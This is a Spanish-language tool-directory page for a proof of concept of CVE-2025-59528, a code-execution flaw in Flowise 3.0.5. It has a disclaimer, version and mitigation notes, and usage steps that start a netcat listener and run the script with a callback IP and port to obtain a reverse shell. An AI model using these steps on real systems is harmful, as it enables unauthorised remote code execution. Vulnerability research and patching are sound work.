Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59528-PoC — The poc of CVE-2025-59528 | Kitploit
Herramientas/GitHubGitHub/sonnelon/cve-2025-59528-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

The poc of CVE-2025-59528

Ver Repositorio
hace 11 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-59528 PoC

Prueba de concepto para investigar CVE-2025-59528 en un entorno de laboratorio aislado.

[!WARNING] DESCARGO DE RESPONSABILIDAD

Este proyecto está destinado estrictamente a fines educativos, investigación de seguridad y pruebas de sistemas que usted posee o para los que cuenta con autorización explícita para realizar pruebas.

No utilice este PoC contra servidores de terceros, servicios públicos o infraestructura sin el permiso del propietario.

El autor no se hace responsable de daños, pérdida de datos, interrupción del servicio o consecuencias legales derivadas del uso indebido de este proyecto.

Descripción

Este PoC demuestra el impacto potencial de CVE-2025-59528, una vulnerabilidad que involucra el procesamiento de mcpServerConfig controlado por el usuario en Flowise.

Bajo ciertas condiciones, la vulnerabilidad puede permitir a un atacante ejecutar código JavaScript arbitrario en el contexto del lado del servidor.

Versiones Afectadas

  • Flowise 3.0.5

Versión Corregida

  • Flowise 3.0.6+

Verifique siempre la versión exacta de la instalación de destino antes de realizar las pruebas.

Requisitos

  • Python 3
  • requests
  • Una instancia de prueba local o aislada de Flowise
  • Una cuenta autorizada con los permisos necesarios

Instale la dependencia de Python:

root@kitploit:~
pip install requests

Uso

Ejecute netcat para obtener una shell:

root@kitploit:~
nc -lvnp <YOUR_PORT>

Ejecute el PoC con:

root@kitploit:~
python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

Argumentos

Configuración del Laboratorio

Las pruebas deben realizarse dentro de una red virtual o de laboratorio aislada.

root@kitploit:~
┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

No exponga una instancia de Flowise intencionalmente vulnerable directamente a Internet público.

Mitigación

Si está ejecutando una versión afectada de Flowise:

  1. Actualice Flowise a una versión parcheada.
  2. Restrinja el acceso a las API administrativas.
  3. Evite otorgar a usuarios no confiables permisos necesarios para acceder a funcionalidades vulnerables.
  4. Revise los registros del servidor para detectar solicitudes sospechosas.
  5. Vuelva a probar la instalación después de actualizar.

Referencias

  • CVE: CVE-2025-59528
  • Software afectado: Flowise
  • Versión corregida: 3.0.6+

Aviso Legal

Al usar este proyecto, usted reconoce que es el único responsable de cumplir con todas las leyes y regulaciones aplicables.

Use este PoC únicamente contra sistemas que le pertenezcan o sistemas para los cuales tenga autorización explícita para realizar pruebas de seguridad.

Descargar herramienta
ArgumentDescription
-t, --targetURL de la instancia de prueba de Flowise
-o, --api_keyClave de API
-i, --ipDirección IP de la máquina de pruebas
-p, --portPuerto utilizado por el entorno de pruebas